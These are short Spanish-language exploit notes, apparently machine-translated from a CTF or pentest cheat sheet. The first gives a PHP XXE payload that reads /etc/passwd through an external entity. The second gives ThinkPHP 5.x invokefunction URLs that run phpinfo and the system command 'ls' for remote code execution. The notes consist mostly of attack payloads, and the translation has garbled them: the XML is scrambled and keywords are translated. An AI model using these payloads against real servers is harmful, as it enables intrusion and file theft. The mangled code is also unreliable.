1. [PHP] XXE
Después libxml2.9.0, por defecto no resuelve entidades externas, dando lugar a vulnerabilidades xx desapareciendo gradualmente
dom.php, SimpleXMLElement.php, la vulnerabilidad simplexml_load_string.php puede desencadenarse XXE
Eructo con la captura, la adición de carga trasera modificada
de carga útil:
<? xml version = "1.0" encoding = "UTF-8"?>
<[DOCTYPE xxe!
<! ELEMENT nombre CUALQUIER>!
"file: /// etc / passwd" <ENTIDAD xxe SISTEMA!>
]>
<root>
< nombre> y xxe; </ name>
</ root>
2. [ThinkPHP] 5-RCE
Thinkphp5 5.0.22 / 5.1.29 código de vulnerabilidad de ejecución remota:
Directamente detrás del aumento de la página web, que se encuentra en la bandera phpinfo
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars [ 0] = sistema y vars [1] [] = ls